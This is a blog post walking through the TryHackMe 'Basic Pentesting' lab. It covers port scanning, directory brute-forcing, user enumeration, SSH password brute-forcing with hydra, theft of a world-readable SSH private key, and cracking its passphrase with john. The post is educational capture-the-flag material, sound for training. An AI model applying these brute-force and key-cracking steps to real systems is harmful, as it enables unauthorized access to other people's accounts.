DEV Community


Posted on

TryHackMe(THM) | Basic Pentesting

Basic Pen-testing ( is a room in TryHackMe designed to cover the basics of Web App Hacking and privilege escalation.
It's a part of the Complete Beginner learning path.

Fire up the machine, connect via openVPN and wait for your ip to show up. Mine was
Ping to ensure that the host is up and you can reach the host.
Start with an nmap scan. I did a simple scan to see that ports 22, 80, 139 and 445 were open and then did the proper scan only on these ports:

└─$ nmap -p 22,80,139,445 -sC -sV 
Starting Nmap 7.91 ( ) at 2021-07-24 00:56 IST
Nmap scan report for
Host is up (0.24s latency).

22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 db:45:cb:be:4a:8b:71:f8:e9:31:42:ae:ff:f8:45:e4 (RSA)
|   256 09:b9:b9:1c:e0:bf:0e:1c:6f:7f:fe:8e:5f:20:1b:ce (ECDSA)
|_  256 a5:68:2b:22:5f:98:4a:62:21:3d:a2:e2:c5:a9:f7:c2 (ED25519)
80/tcp  open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h20m05s, deviation: 2h18m34s, median: 4s
|_nbstat: NetBIOS name: BASIC2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: basic2
|   NetBIOS computer name: BASIC2\x00
|   Domain name: \x00
|   FQDN: basic2
|_  System time: 2021-07-23T15:27:16-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-07-23T19:27:16
|_  start_date: N/A

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 19.99 seconds
Enter fullscreen mode Exit fullscreen mode

Port 80 is open so tried to visit the website running on that port. Checked for the robots.txt -> Not found. Checked the page source for interesting comments.

<!-- Check our dev note section if you need to know what to work on. -->
Enter fullscreen mode Exit fullscreen mode

Tried to visit but in vain. So it was time to run gobuster to bruteforce for directories and files of interest in the website.

└─$ gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,html,txt,zip
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url:           
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              html,txt,zip,php
[+] Timeout:                 10s
2021/07/24 00:59:21 Starting gobuster in directory enumeration mode
/index.html           (Status: 200) [Size: 158]
/development          (Status: 301) [Size: 318] [-->]
Progress: 60945 / 438325 (13.90%)                                                    ^C
[!] Keyboard interrupt detected, terminating.

2021/07/24 01:18:20 Finished
Enter fullscreen mode Exit fullscreen mode

Almost immediately we find On visiting the page, we see that we have access to two files : dev.txt, j.txt

dev.txt :

2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat
to host that on this server too. Haven't made any real web apps yet, but I have tried that example
you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm 
using version 2.5.12, because other versions were giving me trouble. -K

2018-04-22: SMB has been configured. -K

2018-04-21: I got Apache set up. Will put in our content later. -J
Enter fullscreen mode Exit fullscreen mode

j.txt :

For J:

I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials,
and I was able to crack your hash really easily. You know our password policy, so please follow
it? Change that password ASAP.

Enter fullscreen mode Exit fullscreen mode

Doesn't help much, does it? Except for the fact that the name of one of the users 'may' start with j or k!
On enumerating with enum4linux, we find the names of the users in question.

[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)
Enter fullscreen mode Exit fullscreen mode

Since ssh is open, we can try brute-forcing for their password using hydra.

└─$ hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh               
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra ( starting at 2021-07-24 13:30:51
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://
[STATUS] 181.00 tries/min, 181 tries in 00:01h, 14344223 to do in 1320:50h, 16 active
[STATUS] 117.67 tries/min, 353 tries in 00:03h, 14344051 to do in 2031:45h, 16 active
[22][ssh] host:   login: jan   password: <censored>
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 4 final worker threads did not complete until end.
[ERROR] 4 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra ( finished at 2021-07-24 13:37:47
Enter fullscreen mode Exit fullscreen mode

Didn't get results for the user kay, but got the password for user jan. You can use any wordlist for the bruteforcing, but in CTFs or challenges like these, (which are intentionally made solvable, in order to help students!) it's always recommended to use common wordlists like rockyou.txt. Most of the times words are deliberately picked from these wordlists. (Again, this is NOT AT ALL relevant for real world scenarios!)
The password for jan turns out to be <censored>
So sshed as user jan(ssh jan@ and started looking around in the file system. Did some basic manual enumeration :

  • Logged in as kay.
  • Very under-privileged user!!
  • No interesting files(ls -la)
  • Checked /home(cd /home)
  • 2 users jan and kay
  • Checked the files and directories of kay.(ls -la /home/kay)
  • Few interesting ones but with no read permissions
  • Tried running sudo -l : Can't run sudo
  • Checked SUIDs(find / -perm -u=s -type f 2>/dev/null). Nothing interesting
  • Checked crontabs(cat /etc/crontab). Nothing interesting

Time to call! I observed that I had no write permissions even inside jan's home directory. So changed directory to /tmp, where I had permissions to create files.
I set up a simple http server on the port 8080 of my local machine and used wget to download

└─$ python -m SimpleHTTPServer
Serving HTTP on port 8000 ...
Enter fullscreen mode Exit fullscreen mode
wget <machine_ip>:8080/
Enter fullscreen mode Exit fullscreen mode

(Replace <machine_ip> with the ip provided by THM when you connect via openVPN(Not your own machine's public ip))
You can also use the scp command to securely transfer files.
Ran on the system, to realise that /home/kay/.ssh/id_rsa had read permissions for all!
Copied the private key in the local system and tried logging in as kay. But it seemed to be passphrase protected.

Used john to crack the pass-phrase.

-$ /usr/share/john/ kay.id_rsa > kay.hash
-$ john kay.hash
Enter fullscreen mode Exit fullscreen mode

passphrase : <censored>
Used the key to login as kay and read the file pass.bak

└─$ ssh -i kay.id_rsa kay@                                                                 1 ⨯
load pubkey "kay.id_rsa": invalid format
The authenticity of host ' (' can't be established.
ECDSA key fingerprint is SHA256:+Fk53V/LB+2pn4OPL7GN/DuVHVvO0lT9N4W5ifchySQ.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '' (ECDSA) to the list of known hosts.
Enter passphrase for key 'kay.id_rsa': 
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86_64)

 * Documentation:
 * Management:
 * Support:

0 packages can be updated.
0 updates are security updates.

Last login: Mon Apr 23 16:04:07 2018 from
kay@basic2:~$ ls
kay@basic2:~$ cat pass.bak
Enter fullscreen mode Exit fullscreen mode

That was it for the challenge!

Top comments (0)